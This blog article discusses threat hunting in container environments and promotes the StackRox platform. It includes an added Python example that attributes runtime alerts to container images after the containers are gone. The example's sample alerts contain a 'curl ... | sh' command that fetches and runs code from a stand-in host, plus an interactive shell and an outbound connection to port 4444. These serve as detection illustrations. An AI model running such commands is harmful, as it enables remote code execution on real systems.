Threat Hunting in a Container Environment

It's a hostile world out there, with new and innovative threats around every corner. As organizations, particularly larger enterprises, move to cloud computing and adopt DevOps practices and container technologies, threat hunting becomes more complex and difficult. A container environment is highly dynamic, and protecting it requires a security solution that is equally agile.

When it comes to protecting containers, the security landscape of a large enterprise poses two primary challenges. First, traditional network security tools do not fully work for containers. A traditional web application firewall (WAF) intercepts traffic at a network interface and analyzes the HTTP requests flowing through it. That perimeter view is not enough to cover the broader attack surface of containerized applications, which extends beyond the ingress edge to service APIs, east-west traffic between containers on an overlay network, and activity inside the container itself (processes spawned, files changed). A WAF also struggles to keep up with the dynamic, ephemeral context of containers, which are not tied to any specific server and may be scheduled on different hosts from moment to moment.

A host-based tool or network security tool that is not container-aware runs into similar issues. It has no awareness of the container boundary, cannot tell which image, service or deployment a process or connection belongs to, and cannot establish that context across a distributed environment. The result is a blind spot covering the containers and the traffic between them, which leaves application security largely guesswork.

Effective security in a container environment requires a tool that is container-aware and agile enough to adapt quickly. StackRox developed a container security platform that helps enterprises threat hunt by automating and accelerating incident response workflows, with detailed context about the container environment, analysis by multiple machine learning models and easy-to-use security policy management.

That is not a trivial task. The indicators of attack or compromise that security tools and analysts normally look for are remarkably difficult to identify in a container environment. A single application can be spread across multiple microservices and containers, possibly running across multiple servers. Containers are also ephemeral, rapidly spawning and disappearing as demand changes, which means the specific container that produced an indicator may no longer exist by the time the security team attempts to investigate the root cause of an incident.

Companies need a solution that lets them piece together security events across a distributed architecture in a highly dynamic, ever-changing environment. StackRox provides a platform that automatically analyzes the context and history of containers and develops new policies to prevent future incidents. It uses machine learning to create an adaptive security feedback loop. StackRox also provides the tools and mechanisms to capture information from containers and enable root cause analysis of incidents. With StackRox, you can pause or suspend a container for analysis, extract more context around an identified indicator, or capture context that is valuable for more granular analysis.
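The core of the problem described above, attributing an alert to an image and service after the container that raised it is gone, can be shown in a few dozen lines. The following is an added example, not StackRox code and not code from the article: it joins a stream of container lifecycle events (modelled on the JSON that `docker events` emits, with constructed IDs and image names) to runtime alerts from a hypothetical sensor, keeps records for dead containers so their alerts still resolve to an image, flags alerts whose timestamps fall outside the container's lifetime, and aggregates alerts per image as input for a new policy. All log lines, field names on the alert side, and the `shell_spawned`/`outbound_connect` rule names are assumptions made for the example.

```python
import json
from collections import defaultdict

# Constructed sample data (not from the article). Lifecycle lines follow the shape of
# `docker events --format '{{json .}}'`; alert lines are from a hypothetical sensor.
LIFECYCLE_LOG = """
{"Type":"container","Action":"start","time":1000,"Actor":{"ID":"c1a2","Attributes":{"image":"shop/api:1.4","name":"api-7f9"}}}
{"Type":"container","Action":"start","time":1005,"Actor":{"ID":"d3e4","Attributes":{"image":"shop/worker:2.0","name":"worker-x1"}}}
{"Type":"container","Action":"die","time":1090,"Actor":{"ID":"c1a2","Attributes":{"image":"shop/api:1.4","name":"api-7f9","exitCode":"0"}}}
{"Type":"container","Action":"start","time":1100,"Actor":{"ID":"e5f6","Attributes":{"image":"shop/api:1.4","name":"api-2b0"}}}
"""

ALERT_LOG = """
{"time":1040,"container_id":"c1a2","rule":"shell_spawned","detail":"/bin/sh -c curl http://203.0.113.5/x | sh"}
{"time":1120,"container_id":"e5f6","rule":"shell_spawned","detail":"/bin/sh -i"}
{"time":1130,"container_id":"d3e4","rule":"outbound_connect","detail":"203.0.113.5:4444"}
{"time":1200,"container_id":"ffff","rule":"shell_spawned","detail":"/bin/sh"}
"""


def parse_lines(text):
    """One JSON object per non-empty line."""
    return [json.loads(line) for line in text.strip().splitlines() if line.strip()]


def build_container_index(lifecycle_events):
    """Map container ID -> image, name, start and die times.

    Dead containers are deliberately kept: the record is what lets an alert be
    attributed to an image after the container itself has disappeared.
    """
    index = {}
    for ev in lifecycle_events:
        if ev.get("Type") != "container":
            continue
        actor = ev["Actor"]
        attrs = actor.get("Attributes", {})
        rec = index.setdefault(actor["ID"], {
            "image": attrs.get("image"), "name": attrs.get("name"),
            "start": None, "die": None,
        })
        if ev["Action"] == "start":
            rec["start"] = ev["time"]
        elif ev["Action"] == "die":
            rec["die"] = ev["time"]
    return index


def attribute_alerts(alerts, index):
    """Resolve each alert to its image/service and classify it against the lifetime."""
    findings = []
    for alert in alerts:
        rec = index.get(alert["container_id"])
        if rec is None:
            # No lifecycle record at all: a gap in collection, or an ID we never saw.
            findings.append({**alert, "image": None, "name": None,
                             "status": "unknown_container"})
            continue
        if rec["start"] is not None and alert["time"] < rec["start"]:
            status = "before_start"   # clock skew or reused ID; do not trust blindly
        elif rec["die"] is not None and alert["time"] > rec["die"]:
            status = "after_die"      # same: the alert cannot belong to this lifetime
        elif rec["die"] is not None:
            status = "container_gone" # alive when the alert fired, gone now
        else:
            status = "running"        # still up: a candidate for pause-and-capture
        findings.append({**alert, "image": rec["image"], "name": rec["name"],
                         "status": status})
    return findings


def alerts_by_image(findings):
    """Count (image, rule) pairs so repeat offenders stand out across container churn."""
    counts = defaultdict(int)
    for f in findings:
        if f["image"] is not None:
            counts[(f["image"], f["rule"])] += 1
    return dict(counts)


def suggest_policies(findings, threshold=2):
    """(image, rule) pairs seen at least `threshold` times: candidates for a new block rule."""
    return sorted(k for k, n in alerts_by_image(findings).items() if n >= threshold)


def hunt(lifecycle_text=LIFECYCLE_LOG, alert_text=ALERT_LOG):
    index = build_container_index(parse_lines(lifecycle_text))
    return attribute_alerts(parse_lines(alert_text), index)


if __name__ == "__main__":
    for f in hunt():
        print(f["time"], f["status"], f["image"], f["rule"], f["detail"])
    print("policy candidates:", suggest_policies(hunt()))
```

The first alert is the interesting one: the container `c1a2` that ran `curl ... | sh` exited at time 1090, so a hunter who only queries running containers finds nothing, while the lifecycle index still attributes it to `shop/api:1.4`. The second shell in a fresh container of the same image pushes that image over the threshold and surfaces it as a policy candidate; alerts for `e5f6` and `d3e4` are marked `running`, which is the point at which pausing the container and capturing its state is still possible.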

There are many benefits to cloud computing, financial, operational and strategic, and there are further advantages that come from DevOps and containers. To realize those benefits, though, security still has to be a primary consideration. It is important to deploy intelligent, agile security tools that can keep pace with a dynamic container environment while still providing the visibility and context that effective security requires.

Tony Bradley

I have a passion for technology and gadgets--with a focus on Microsoft and security--and a desire to help others understand how technology can affect or improve their lives. I also love spending time with my wife, 7 kids, 2 dogs, 5 cats, 3 rabbits, 2 ferrets, pot-bellied pig and sulcata tortoise, and I like to think I enjoy reading and golf even though I never find time for either. You can contact me directly at tony@techspective.net. For more from me, you can follow me on Twitter and Facebook.
